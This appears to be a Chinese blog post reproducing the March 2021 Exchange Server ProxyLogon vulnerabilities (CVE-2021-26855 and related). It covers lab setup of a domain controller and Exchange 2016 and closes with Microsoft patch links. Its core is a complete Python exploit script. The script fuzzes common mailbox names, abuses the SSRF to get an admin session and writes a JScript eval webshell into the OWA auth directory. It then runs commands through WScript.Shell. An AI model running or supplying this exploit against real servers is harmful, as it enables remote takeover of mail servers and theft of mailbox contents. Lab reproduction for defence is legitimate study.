amingMM
amingMM

漏洞复现-CVE-2021-26855 2021年3月 Exchange Server RCE

Exchange Server RCE

  • 简介
  • 漏洞概述
  • 影响版本
  • 环境搭建
    • 安装AD域控
    • 下一步到安装
    • 点击"将此服务器提升为域控制器"
    • 设置密码
    • 显示无法创建DNS服务器委派,无视,下一步
    • 选择安装的位置以及日志文件位置
    • 如果提示
    • 安装完成后自动重启即完成。
    • 安装 Exchange Server 2016
    • 开始安装,选择不更新。
      • 启用exchange自带的杀毒
    • 配置先决条件出错。
    • 安装成功后访问https://localhost/ecp 即可到达exchange管理中心。
      • 使用域名\用户名,密码即可登录管理中心。
  • 漏洞利用
    • 尝试 CVE-2021-26855 SSRF漏洞。
    • 执行exp
  • 修复方式

简介

Exchange Server
微软公司的一套电子邮件服务组件,消息与协作系统,
主要提供包括从电子邮件、会议安排、团体日程管理、任务管理、文档管理、实时会议和工作流等协作应用。

漏洞概述

CVE-2021-26855
该漏洞是Exchange中的服务端请求伪造漏洞(SSRF),
利用此漏洞的攻击者能够发送任意HTTP请求并绕过Exchange Server身份验证,远程未授权的攻击者可以利用该漏洞以进行内网探测,
并可以用于窃取用户邮箱的全部内容。

CVE-2021-26857
该漏洞是Unified Messaging 服务中的不安全的反序列化漏洞。
利用该漏洞,攻击者可以发送精心构造的恶意请求,
从而在Exchange Server上以SYSTEM身份执行任意代码。

CVE-2021-26858
该漏洞是Exchange中的任意文件写入漏洞。
该漏洞需要进行身份认证,
利用此漏洞可以将文件写入服务器上的任何路径。

并可以结合利用CVE-2021-26855 SSRF漏洞或绕过权限认证进行文件写入。

CVE-2021-27065
该漏洞是Exchange中的任意文件写入漏洞。
该漏洞需要进行身份认证,
利用此漏洞可以将文件写入服务器上的任何路径。
并可以结合利用CVE-2021-26855
SSRF漏洞或绕过权限认证进行文件写入。

影响版本

Microsoft Exchange 2013

Microsoft Exchange 2016

Microsoft Exchange 2019

Microsoft Exchange 2010

环境搭建

漏洞复现-CVE-2021-26855 2021年3月 Exchange Server RCE_第1张图片

安装AD域控

windows server 2016。
点击管理>添加角色和功能向导,选择Active Directory 域服务 和 DNS 服务器。

漏洞复现-CVE-2021-26855 2021年3月 Exchange Server RCE_第2张图片

下一步到安装

漏洞复现-CVE-2021-26855 2021年3月 Exchange Server RCE_第3张图片

点击"将此服务器提升为域控制器"

这里选择添加新林,然后给自己主机定义一个内部域名,最好和外部域名称不同。

漏洞复现-CVE-2021-26855 2021年3月 Exchange Server RCE_第4张图片

设置密码

漏洞复现-CVE-2021-26855 2021年3月 Exchange Server RCE_第5张图片

显示无法创建DNS服务器委派,无视,下一步

漏洞复现-CVE-2021-26855 2021年3月 Exchange Server RCE_第6张图片

选择安装的位置以及日志文件位置

漏洞复现-CVE-2021-26855 2021年3月 Exchange Server RCE_第7张图片
漏洞复现-CVE-2021-26855 2021年3月 Exchange Server RCE_第8张图片
漏洞复现-CVE-2021-26855 2021年3月 Exchange Server RCE_第9张图片

如果提示

域控制器升级的先决条件验证失败。
新建域时,本地 Administrator 帐户将成为域 Administrator 帐户。
无法新建域,因为本地 Administrator 帐户密码不符合要求。

目前,本地 Administrator 密码为空白,这可能会导致安全问题。
我们建议你按 Ctrl+Alt+Delete,使用网络用户命令行工具,
或者在使用本地用户和组为本地 Administrator 帐户设置强密码之后,新建域。

安装完成后自动重启即完成。

漏洞复现-CVE-2021-26855 2021年3月 Exchange Server RCE_第10张图片

安装 Exchange Server 2016

然后下载Exchange
 
https://www.microsoft.com/zh-cn/download/confirmation.aspx?id=102114  
然后下载.NET4.8 
 
https://docs.microsoft.com/zh-cn/exchange/plan-and-deploy/prerequisites?view=exchserver-2016
 
下载C++ 依赖包
 
https://www.microsoft.com/en-us/download/details.aspx?id=30679

安装Visual C++ Redistributable Packages for Visual Studio 2013

记得下载的时候选择英文。。中文的会检测的时候一直通不过

开始安装,选择不更新。

漏洞复现-CVE-2021-26855 2021年3月 Exchange Server RCE_第11张图片
漏洞复现-CVE-2021-26855 2021年3月 Exchange Server RCE_第12张图片
漏洞复现-CVE-2021-26855 2021年3月 Exchange Server RCE_第13张图片
漏洞复现-CVE-2021-26855 2021年3月 Exchange Server RCE_第14张图片
漏洞复现-CVE-2021-26855 2021年3月 Exchange Server RCE_第15张图片
漏洞复现-CVE-2021-26855 2021年3月 Exchange Server RCE_第16张图片
漏洞复现-CVE-2021-26855 2021年3月 Exchange Server RCE_第17张图片

启用exchange自带的杀毒

漏洞复现-CVE-2021-26855 2021年3月 Exchange Server RCE_第18张图片

配置先决条件出错。

主要问题是"需要对 Active Directory 进行全局更新,并且此用户帐户不是 ‘Enterprise Admins’ 组的成员。"

我把user用户和administrator添加到要求的组里然后,
切换用户到administrator试了试安装就可以了。

漏洞复现-CVE-2021-26855 2021年3月 Exchange Server RCE_第19张图片
漏洞复现-CVE-2021-26855 2021年3月 Exchange Server RCE_第20张图片
漏洞复现-CVE-2021-26855 2021年3月 Exchange Server RCE_第21张图片

安装成功后访问https://localhost/ecp 即可到达exchange管理中心。

漏洞复现-CVE-2021-26855 2021年3月 Exchange Server RCE_第22张图片

使用域名\用户名,密码即可登录管理中心。

漏洞利用

尝试 CVE-2021-26855 SSRF漏洞。

漏洞复现-CVE-2021-26855 2021年3月 Exchange Server RCE_第23张图片

执行exp

漏洞复现-CVE-2021-26855 2021年3月 Exchange Server RCE_第24张图片

修改了一下exp,如果不知道用户名可以直接指定后缀,会自动测试常用用户名。

exp.py -u 127.0.0.1 -suffix @ex.com

如果知道一个存在的用户就直接

exp.py -u 127.0.0.1 -user admin@ex.com

# -*- coding: utf-8 -*-
import requests
from urllib3.exceptions import InsecureRequestWarning
import random
import string
import argparse
 
parser = argparse.ArgumentParser(description='Example: python exp.py -u 127.0.0.1 -email test -suffix @ex.com\n如果不清楚用户名,可不填写-email参数,将自动Fuzz用户名。')
parser.add_argument('-u', type=str,
                    help='target')
parser.add_argument('-user',
                    help='exist email',default='')
parser.add_argument('-suffix',
                    help='email suffix')
args = parser.parse_args()
 
def id_generator(size=6, chars=string.ascii_lowercase + string.digits):
    return ''.join(random.choice(chars) for _ in range(size))
 
proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
 
target=args.u
suffix=args.suffix
exist_email=args.user
fuzz_email=['administrator','webmaste','support','sales','contact','admin','test','test2','test01','test1','guest','sysadmin','info','noreply','log','no-reply']
fuzz_email.insert(0,exist_email)
random_name = id_generator(4) + ".js"
user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
 
shell_path = "Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\test11.aspx"
shell_absolute_path = "\\\\127.0.0.1\\c$\\%s" % shell_path
 
# webshell-马子内容
shell_content = '<script language="JScript" runat="server"> function Page_Load(){/**/eval(Request["code"],"unsafe");}</script>'
for i in fuzz_email:
    new_email=i+suffix
    autoDiscoverBody = """://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006">
    <Request>
      <EMailAddress>%s</EMailAddress> <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a
    </Request>
</Autodiscover>
""" % new_email
    print("正在获取Exchange Server " + target+" 权限")
    FQDN = "EXCHANGE01"
    ct = requests.get("https://%s/ecp/%s" % (target, random_name), headers={"Cookie": "X-BEResource=localhost~1942062522",
                                                                            "User-Agent": user_agent},
                      verify=False,proxies=proxies)
 
    if "X-CalculatedBETarget" in ct.headers and "X-FEServer" in ct.headers:
        FQDN = ct.headers["X-FEServer"]
 
 
    ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={
        "Cookie": "X-BEResource=%s/autodiscover/autodiscover.xml?a=~1942062522;" % FQDN,
        "Content-Type": "text/xml",
        "User-Agent": user_agent},
                       data=autoDiscoverBody,
                        proxies=proxies,
                       verify=False
                       )
 
    if ct.status_code != 200:
        print(ct.status_code)
        print("Autodiscover Error!")
        #exit()
 
    if "" not in str(ct.content):
        print("Can not get LegacyDN!")
        #exit()
    try:
        legacyDn = str(ct.content).split("")[1].split(r"")[0]
        print("Got DN: " + legacyDn)
 
        mapi_body = legacyDn + "\x00\x00\x00\x00\x00\xe4\x04\x00\x00\x09\x04\x00\x00\x09\x04\x00\x00\x00\x00\x00\x00"
 
        ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={
            "Cookie": "X-BEResource=Administrator@%s:444/mapi/emsmdb?MailboxId=f26bc937-b7b3-4402-b890-96c46713e5d5@exchange.lab&a=~1942062522;" % FQDN,
            "Content-Type": "application/mapi-http",
            "X-Requesttype": "Connect",
            "X-Clientinfo": "{2F94A2BF-A2E6-4CCCC-BF98-B5F22C542226}",
            "X-Clientapplication": "Outlook/15.0.4815.1002",
            "X-Requestid": "{E2EA6C1C-E61B-49E9-9CFB-38184F907552}:123456",
            "User-Agent": user_agent
        },
                           data=mapi_body,
                           verify=False,
        proxies=proxies
                           )
        if ct.status_code != 200 or "act as owner of a UserMailbox" not in str(ct.content):
            print("Mapi Error!")
            exit()
 
        sid = str(ct.content).split("with SID ")[1].split(" and MasterAccountSid")[0]
 
        print("Got SID: " + sid)
        sid = sid.replace(sid.split("-")[-1],"500")
 
        proxyLogon_request = """" ln="john">%s7" t="1">S-1-1-07" t="1">S-1-5-27" t="1">S-1-5-117" t="1">S-1-5-153221225479" t="1">S-1-5-5-0-6948923</s></r>
        """ % sid
 
        ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={
            "Cookie": "X-BEResource=Administrator@%s:444/ecp/proxyLogon.ecp?a=~1942062522;" % FQDN,
            "Content-Type": "text/xml",
            "msExchLogonMailbox": "S-1-5-20",
            "User-Agent": user_agent
        },
                           data=proxyLogon_request,
        proxies=proxies,
                           verify=False
                           )
        if ct.status_code != 241 or not "set-cookie" in ct.headers:
            print("Proxylogon Error!")
            exit()
 
        sess_id = ct.headers['set-cookie'].split("ASP.NET_SessionId=")[1].split(";")[0]
 
        msExchEcpCanary = ct.headers['set-cookie'].split("msExchEcpCanary=")[1].split(";")[0]
        print("Got session id: " + sess_id)
        print("Got canary: " + msExchEcpCanary)
 
        ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={
            #"Cookie": "X-BEResource=Administrator@%s:444/ecp/DDI/DDIService.svc/GetObject?schema=OABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s" % (
                #FQDN, msExchEcpCanary, sess_id, msExchEcpCanary),
 
            "Cookie": "X-BEResource=Admin@{server_name}:444/ecp/DDI/DDIService.svc/GetList?reqId=1615583487987&schema=VirtualDirectory&msExchEcpCanary={msExchEcpCanary}&a=~1942062522; ASP.NET_SessionId={sess_id}; msExchEcpCanary={msExchEcpCanary1}".
                           format(server_name=FQDN, msExchEcpCanary1=msExchEcpCanary, sess_id=sess_id,
                                  msExchEcpCanary=msExchEcpCanary),
            "Content-Type": "application/json; charset=utf-8",
            "msExchLogonMailbox": "S-1-5-20",
            "User-Agent": user_agent
 
        },
                           json={"filter": {
                               "Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel",
                                              "SelectedView": "", "SelectedVDirType": "OAB"}}, "sort": {}},
                           verify=False,
        proxies=proxies
                           )
 
        if ct.status_code != 200:
            print("GetOAB Error!")
            exit()
        oabId = str(ct.content).split('"RawIdentity":"')[1].split('"')[0]
        print("Got OAB id: " + oabId)
 
        oab_json = {"identity": {"__type": "Identity:ECP", "DisplayName": "OAB (Default Web Site)", "RawIdentity": oabId},
                    "properties": {
                        "Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel",
                                       "ExternalUrl": "http://ffff/#%s" % shell_content}}}
 
        ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={
            "Cookie": "X-BEResource=Administrator@%s:444/ecp/DDI/DDIService.svc/SetObject?schema=OABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s" % (
                FQDN, msExchEcpCanary, sess_id, msExchEcpCanary),
            "msExchLogonMailbox": "S-1-5-20",
            "Content-Type": "application/json; charset=utf-8",
            "User-Agent": user_agent
        },
                           json=oab_json,
        proxies=proxies,
                           verify=False
                           )
        if ct.status_code != 200:
            print("Set external url Error!")
            exit()
 
        reset_oab_body = {"identity": {"__type": "Identity:ECP", "DisplayName": "OAB (Default Web Site)", "RawIdentity": oabId},
                          "properties": {
                              "Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel",
                                             "FilePathName": shell_absolute_path}}}
 
        ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={
            "Cookie": "X-BEResource=Administrator@%s:444/ecp/DDI/DDIService.svc/SetObject?schema=ResetOABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s" % (
                FQDN, msExchEcpCanary, sess_id, msExchEcpCanary),
            "msExchLogonMailbox": "S-1-5-20",
            "Content-Type": "application/json; charset=utf-8",
            "User-Agent": user_agent
        },
                           json=reset_oab_body,
        proxies=proxies,
                           verify=False
                           )
 
        if ct.status_code != 200:
            print("写入shell失败了啊")
            exit()
 
        print("成功了。马上就验证shell是否OK!")
        print("POST  shell:https://"+target+"/owa/auth/test11.aspx")
        shell_url="https://"+target+"/owa/auth/test11.aspx"
        print('code=Response.Write(new ActiveXObject("WScript.Shell").exec("whoami").StdOut.ReadAll());')
        print("正在请求shell")
        import time
        time.sleep(1)
        data=requests.post(shell_url,data={"code":"Response.Write(new ActiveXObject(\"WScript.Shell\").exec(\"whoami\").StdOut.ReadAll());"},verify=False,proxies=proxies)
        if data.status_code != 200:
            print("写入shell失败")
        else:
            print("shell:"+data.text.split("OAB (Default Web Site)")[0].replace("Name                            : ",""))
            print('[+]用户名: '+new_email)
            break;
    except:
        print('[-]用户名: '+new_email)
        print("=============================")

修复方式

1、微软官方已经发布了解决上述漏洞的安全更新,建议受影响用户尽快升级到安全版本,官方安全版本下载可以参考以下链接:

CVE-2021-26855: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855

CVE-2021-26857: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857

CVE-2021-26858: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858

CVE-2021-27065: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065

2、若无法及时进行升级,建议采用官方的临时措施进行防御:

https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/

你可能感兴趣的:(渗透测试,服务器,安全,网络)

  • 把哈希表换成 tire 树,居然为公司省下了几千万 老码沉思录 web性能优化散列表数据结构
    你有没有想过,仅仅省下1%的计算资源,能为一家大公司带来多大的影响?你可能觉得,1%听起来微不足道,完全不值得一提。但今天我们聊一下一个技术优化点,就是关于如何通过微小的优化,Cloudflare这样的大型网络公司如何省下了大量的计算资源,背后还有不少值得我们学习的智慧。你也在为计算资源头疼吗?如果你是个开发者,尤其是负责维护大规模服务的开发者,你一定对计算资源的消耗有深刻的体会。无论是服务器的C
  • 网络安全学习路线图(2024版详解) 白帽子008 web安全学习安全网络网络安全
    近期,大家在网上对于网络安全讨论比较多,想要学习的人也不少,但是需要学习哪些内容,按照什么顺序去学习呢?其实我们已经出国多版本的网络安全学习路线图,一直以来效果也比较不错,本次我们针对市场需求,整理了一套系统的网络安全学习路线图,供大家学习参考。希望大家按照路线图进行系统学习不仅可以更高效的完成上岸,还能够系统化学习,提升自己的后期竞争力。第一阶段:数通安全Windows系统安全1.企业资产安全规
  • 2024年网络安全最新疫情过后,这个行业人才缺口达327万,还不赶紧入行拿高薪 网络安全_入门教程 web安全安全网络安全
    前段时间,西工大事件刷屏,很多人才突然意识到我国网络空间安全面临的形势有多恶劣。当前,国际网络空间对抗趋势越发凸显,我们面对的不再是散兵游勇式的攻击,而是以窃取敏感数据、破坏关键信息技术设施为目标的有组织的国际间的网络攻击。零日漏洞、供应链攻击、数据泄露等重大安全事件层出不穷。我国正在迎来数字经济的发展浪潮,千行百业的数字化转型,都需要有网络安全的坚实保障。但,网络安全人才短缺的问题已经困扰企业多
  • API技术简介与开发趋势 APItesterCris 数据挖掘API接口分享数据库大数据开发语言数据挖掘前端
    在当今的数字化时代,API(应用程序编程接口)技术已成为连接不同软件和服务的关键技术。API允许不同的应用程序之间进行交互,共享数据和功能,极大地提升了软件开发的效率和可扩展性。随着技术的进步和市场需求的变化,API开发呈现出一些新的趋势。API技术的基本概念不难理解。简单来说,API是一组规则和协议,用于定义软件组件如何与其他组件交互。通过API,开发者可以让一个程序安全地调用另一个程序的功能或
  • 从零开始学习黑客技术,看这一篇就够了 网络安全-旭师兄 学习安全开源web安全网络
    黑客,对于很多人来说,是一个神秘的代名词,加之影视作品夸张的艺术表现,使得黑客这个本来只专注于技术的群体,散发出亦正亦邪的神秘色彩。黑客源自英文hacker一词,最初曾指热心于计算机技术、水平高超的电脑高手,尤其是程序设计人员,逐渐区分为白帽、灰帽、黑帽等。其中,白帽黑客被称为道德黑客。他们不会非法入侵用户网络,而是通过一系列测试检查公司安全系统的效率;黑帽黑客恰好与白帽黑客相反,他们往往为了个人
  • 2024网络安全学习路线 非常详细 推荐学习 白帽黑客-晨哥 web安全学习安全数据库php
    关键词:网络安全入门、渗透测试学习、零基础学安全、网络安全学习路线首先咱们聊聊,学习网络安全方向通常会有哪些问题1、打基础时间太长学基础花费很长时间,光语言都有几门,有些人会倒在学习linux系统及命令的路上,更多的人会倒在学习语言上;2、知识点掌握程度不清楚对于网络安全基础内容,很多人不清楚需要学到什么程度,囫囵吞枣,导致在基础上花费太多时间;看到很多小伙伴,买了HTML,PHP,数据库,计算机
  • 入门网络安全工程师要学习哪些内容 白帽黑客2659 web安全学习安全网安入门网络安全
    大家都知道网络安全行业很火,这个行业因为国家政策趋势正在大力发展,大有可为!但很多人对网络安全工程师还是不了解,不知道网络安全工程师需要学什么?知了堂小编总结出以下要点。网络安全工程师是一个概称,学习的东西很多,具体学什么看自己以后的职业定位。如果你以后想成为安全产品工程师,学的内容侧重点就和渗透测试工程师不一样,如果你想成为安全开发工程师,学的侧重点就和安全运维工程师不一样。网络安全工程师学的东
  • 【系统分析师】-安全体系 宣晨光 系统分析师软考真题标签安全软考系统分析
    考点综述(1)综合知识:包括加密密钥和公开密钥算法:计算机病毒及防治技术计算机犯罪基本概念与防范措施、入侵检测与防范、系统访问控制技术;信息删除、修改、插入和丢失;伪造与重放攻击的防止;SHA、MD5;私有信息保护。(2)案例:根据具体案例,说明在网络与分布式环境下的分布式应用系统在安全性方面需要考虑的因素。(3)论文:包括入侵检测、VPN、安全协议(IPSec、SSL、PGP、HTTPSSSL)
  • nginx配置负载均衡的几种方式 itbigold nginx负载均衡
    1,轮询(默认)每个请求按时间顺序逐一分配到不同的后端服务器,如果后端服务器down掉,能自动剔除。   #反向代理配置   upstreamserver_list{    #这个是tomcat的访问路径    serverlocalhost:8080;    serverlocalhost:9999;   }   server{       listen   80;       server_n
  • 中国人该不该过圣诞节 简藤兮
    中国人到底该不该过圣诞节,这个问题可能年年都在争论,尤其是网络上吵成一片,各种极端的说法都会出现。但是,不管争论如何激烈,过的人照样过,不过的人照样不过。今天上午转了家商场,感觉也没啥气氛。有些店家在门口摆上了圣诞树,有些就不摆。圣诞树也差异很大,有的挺气派的,高高大大;有的瘦骨伶仃矮小可怜,一看就是凑热闹的。图片发自App
  • 速盾:虚拟主机能用cdn吗? 速盾cdn ddos网络服务器
    虚拟主机(VirtualHosting)是一种通过在一台物理服务器上划分多个虚拟服务器来提供网站托管服务的解决方案。虚拟主机被广泛应用于中小型网站,因为它具有成本低廉、易于管理的特点。然而,许多使用虚拟主机的网站可能会面临性能瓶颈和访问速度慢的问题。这时候,使用内容分发网络(ContentDeliveryNetwork,CDN)可以极大地改善网站的性能和用户体验。CDN是由分布在世界各地的服务器组
  • 速盾:普通cdn和高防cdn差别在哪里? 速盾cdn 网络安全运维
    CDN(ContentDeliveryNetwork)是一种通过在全球各个位置部署服务器来提供快速内容传输服务的网络架构。普通CDN和高防CDN都是CDN服务的两种类型,它们的主要差别体现在以下几个方面。首先,普通CDN和高防CDN的安全性不同。普通CDN主要用于加速内容传输,对于网络安全的防护能力较弱。而高防CDN则专注于提供更强的安全防护,包括抵御DDoS攻击、CC攻击等网络攻击形式。高防CD
  • 速盾:cdn请求次数千万正常吗 速盾cdn 网络web安全分布式
    CDN(ContentDeliveryNetwork)是一种用于提高网络内容传输速度和可靠性的网络基础设施。它通过在全球分布多个数据中心的服务器存储网站的静态资源,将用户请求分发到最近的服务器,从而减少数据传输的时间和延迟。但是,对于CDN请求次数达到千万级别,我们需要根据具体情况来评估其是否正常。首先,我们需要考虑的是该CDN请求次数的时间跨度。如果这千万级别的请求是在很短的时间内产生的,例如几
  • 速盾:中秋节使用cdn的企业多吗? 速盾cdn 前端数据库运维
    中秋节是中国传统的重要节日之一,人们会通过各种方式来庆祝这一节日,包括赏月、吃月饼、团圆等。在这个期间,各个行业都会做出相关的准备来迎接节日的到来,其中包括使用CDN加速技术的企业。CDN,即内容分发网络,是一种通过将内容分发到全球分布的服务器上,以提高用户访问速度和服务质量的技术。在中秋节期间,由于节日的特殊性,各个企业在推出相关促销活动、提供特色服务等方面都会增加网络流量和访问量。为了应对这种
  • 速盾高防cdn是怎么解决网站攻击的? 速盾cdn web安全安全ddos
    速盾高防CDN是一种基于云计算技术的网络安全解决方案,可以有效地保护网站免受各种网络攻击的威胁。它通过在全球多个节点部署服务器,将网站内容缓存到这些服务器上,并通过智能路由技术将用户的请求引导到最近的服务器上,以提供更快的访问速度和更好的网络性能。速盾高防CDN主要采用以下几种方式来解决网站攻击:分布式拒绝服务攻击(DDoS)防护:DDoS攻击是一种常见的网络攻击手段,攻击者通过向目标网站发送大量
  • 速盾:什么是CDN机房 速盾cdn github服务器网络
    CDN(ContentDeliveryNetwork)即内容分发网络,是指由分布在不同地区的多个服务器组成的网络,用于加速互联网上的内容传输和分发。CDN机房指的是存放CDN服务器的房间或建筑物。CDN旨在解决互联网上内容分发的延迟和可靠性问题。在传统的互联网环境下,当用户访问一个网站或下载一个文件时,通常是从源服务器上下载内容。但由于源服务器通常位于地理位置较远的地方,这导致了传输的延迟和内容加
  • 速盾:高防CDN是怎样防御的? 速盾cdn 网络web安全安全
    随着互联网的快速发展,网站安全问题也日益突出。为了保护网站避免遭受恶意攻击,高防CDN(ContentDeliveryNetwork)应运而生。高防CDN通过一系列的安全防护措施来保护网站免受DDoS(分布式拒绝服务)和其他恶意攻击的影响。首先,高防CDN提供了分布式架构,将网站的内容和流量分散到全球各地的节点服务器中。这样做的目的是为了分散攻击者对网站的恶意访问,并避免单点故障。当攻击发生时,高
  • 速盾:全面分析高防 CDN 和 CDN 对比? 速盾cdn 网络运维web安全
    在当今数字化时代,网站的性能和安全性对于企业和个人来说至关重要。为了提高网站的访问速度和安全性,许多人会选择使用CDN(ContentDeliveryNetwork,内容分发网络)或高防CDN。那么,高防CDN和普通CDN有什么区别呢?下面我们来进行全面分析。一、CDN的基本概念和作用CDN的定义CDN是一种分布式的网络架构,它通过在全球各地部署服务器节点,将网站的内容缓存到这些节点上。当用户访问
  • linux运维常见命令行 问道飞鱼 运维linux服务器
    文章目录用户管理创建用户修改用户信息列出用户信息添加用户到组删除用户创建和管理组查看用户和组的信息其他相关命令文件管理文件和目录的基本操作文件权限管理文件压缩和归档磁盘管理查看磁盘使用情况查看文件和目录的磁盘使用情况磁盘分区管理挂载和卸载文件系统磁盘配额管理LVM(LogicalVolumeManager)管理网络管理查看网络接口状态配置网络接口查看和管理路由表管理DNS和主机名网络诊断工具网络流
  • 熊孩子“天价”打赏主播,还不跟孩子谈钱吗? 晨星商学院
    2020年这场疫情,让孩子们返校时间一直推迟,教育部发出通知统一进行线上教育,从学校上课转移到了网上上课,除了使用电脑之外,孩子们使用最多的就是家长的手机。那么,孩子频繁接触网络真的好吗?最近许多小学生失去理智,一掷千金打赏主播的新闻更是接连不断。父母含辛茹苦,孩子却挥金如土,看看这些败家的孩子都做些什么:素材来源:@作家李召军微博疫情期间妈妈被派到一线做防疫工作,为了让孩子上课方便,将手机留给孩
  • Linux-文件权限管理 蜡笔晴天 linux运维服务器
    目录目录前言Linux用户权限解析1.基本权限UGO1.1设置权限:2.高级权限2.1suid2.2sgid2.3sbit2.4sudo给普通用户提权3.特殊权限4.隐藏权限总结前言linux服务器上有严格的权限等级,如果权限过高导致误操作会增加服务器的风险。所以对于了解linux系统中的各种权限及要给用户,服务等分配合理的权限十分重要。文件权限大致分为基本权限、高级权限、特殊权限和隐藏权限,下面
  • 某金融企业生产环境下信创数据库运维管理规范 罗伯特之技术屋 VIP专栏数据库金融运维
    数据是企业的生命线,企业为了保障数据库的稳定运行和数据的安全,设计一套数据库运维管理规范非常关键。信创浪潮来临后,在金融业中,IT技术部门更应尽快熟悉掌握信创数据库的管理技术,并形成规范化的数据库运维管理体系。信创数据库的运维管理,更需做好规划配置管理、监控管理、容灾备份管理、安全管理,并形成规范。合理的运维管理规范不仅能够提高信创数据库的管理效率和运行性能,还能够提高信创数据库的稳定性,保障数据
  • 网站被挂黑链是什么原因,如何解决挂黑链问题! 南帝seo seo技术
    前几天网上有个人,他说的他网站被挂了黑链,问我怎么解决,我用检测工具已检查果然是被别人挂了黑链,域名放到qq输入框里面就是显示飘红,放到微信里面根本就打不开,被拦截了。那么,接下来南帝seo老师就为大家讲解被挂黑链的原因以及如何解决。一、网站被挂黑链是什么原因网站被挂黑链了,原因就是所谓的黑客入侵了你的服务器或者是你网站程序有漏洞通过你网站漏洞进行注入脚本代码放入一些大量的灰色词进去,还有一种就是
  • 省钱快报是真的吗?分析省钱快报买东西是否靠谱! 好项目高省
    首先给大家介绍一下省钱快报,省钱快报是一款网络购物应用,它是与天猫、tb、京东等一线商品合作的一款软件,每天会选择各式各样的一款供我们用户进行领取使用,而优惠券的来源是从商家内部网址之中拿出的,所以来说优惠的力度相当的大。那省钱快报是真的能够省钱吗?高省APP佣金更高,模式更好,终端用户不流失。【高省】是一个自用省钱佣金高,分享推广赚钱多的平台,百度有几百万篇报道,也期待你的加入。古楼导师高省邀请
  • 斯尔福智慧实验室三阶段详解 斯尔福实验室设备 大数据
    未来二十时间,实验室智能化是各类实验室的发展方向。在这样的时代背景下,斯尔福提出设计建造更安全、舒适、高效、节能的智慧实验室,是整个实验室设计、建设的核心目地。斯尔福将智慧实验室分为3个阶段。如何实现实验室信息数据智能化,LEMS实验室智能环境设施管理系统,以实验室为中心,采用先进的计算机网络技术、数据库技术以及三维仿真技术,将实验室整体环境,包括设备。人员。危险物等数据,结合实验室用户标准化管理
  • 在centos上搭建syslog服务端 C000kie Linuxcentoslinux
    在CentOS上搭建一个syslog服务器,可以使用rsyslog服务安装rsyslog:sudoyuminstallrsyslog编辑配置文件/etc/rsyslog.conf,确保以下设置:确保服务器监听在UDP514端口上:$ModLoadimudp$UDPServerRun514禁止本地日志记录,只接受远程日志,配置日志文件的存储位置:所有的日志事件都会按照RSYSLOG_Traditio
  • c++使用_beginthreadex创建线程 梦想患者 功能开发小技巧c++Thread
    记录使用_beginthreadex(),来创建线程。方便后期的使用。创建一个线程相关函数介绍unsignedlong_beginthreadex(void*security,//安全属性,为NULL时表示默认安全性unsignedstack_size,//线程的堆栈大小,一般默认为0unsigned(_stdcall*start_address)(void*),//所要启动的线程函数void*a
  • 2024年网络安全工程师的发展前景如何?红利还有吗? 程序员小予 web安全网络安全网络安全系统安全计算机网络密码学
    基于入门网络安全/黑客打造的:黑客&网络安全入门&进阶学习资源包2021年7月12日工信部发布的《网络安全产业高质量发展三年行动计划(2021-2023年)》,文件中提出,2023年网络安全产业规模超过2500亿元,年复合增长率超过15%。一批网络安全关键核心技术实现突破,达到先进水平。网络安全技术创新能力明显提高,产品和服务水平不断提升,经济社会网络安全需求加快释放,产融合作精准高效,网络安全人
  • 微生物数据的sparcc网络分析 桂渊泉树 数据分析r语言
    sparcc网络分析运行sparcc首先先安装fastspar,地址https://github.com/scwatts/fastspar整理abundance_counts数据,abundance_counts.txt格式为第一列为featureID,且列名为#OTUID,其他列是样本的OTU丰度然后执行下列脚本fastspar--iterations50--exclude_iterations
  • 大模型时代,新手和程序员如何转型入局大模型行业? 我爱学AI transformer人工智能自然语言处理深度学习大模型训练转行大模型LLM
    在当今大模型迅猛发展的环境下,人工智能的应用越来越广泛。然而,这些大模型的背后隐藏着更为深厚的基础技术——传统机器学习和神经网络。理解这些基础技术,不仅能够帮助我更好地使用大模型,还能为我提供创新和解决实际问题的能力。因此,在这个AI迅猛发展的时代,掌握传统机器学习和神经网络显得尤为重要。在近期的全国两会上,“人工智能”再次被提及,并成为国家战略的焦点。这一举措预示着在接下来的十年到十五年里,人工
  • jQuery 跨域访问的三种方式 No 'Access-Control-Allow-Origin' header is present on the reque qiaolevip 每天进步一点点学习永无止境跨域众观千象
    XMLHttpRequest cannot load http://v.xxx.com. No 'Access-Control-Allow-Origin' header is present on the requested resource. Origin 'http://localhost:63342' is therefore not allowed access. test.html:1
  • mysql 分区查询优化 annan211 java分区优化mysql
    分区查询优化 引入分区可以给查询带来一定的优势,但同时也会引入一些bug. 分区最大的优点就是优化器可以根据分区函数来过滤掉一些分区,通过分区过滤可以让查询扫描更少的数据。 所以,对于访问分区表来说,很重要的一点是要在where 条件中带入分区,让优化器过滤掉无需访问的分区。 可以通过查看explain执行计划,是否携带 partitions
  • MYSQL存储过程中使用游标 chicony Mysql存储过程
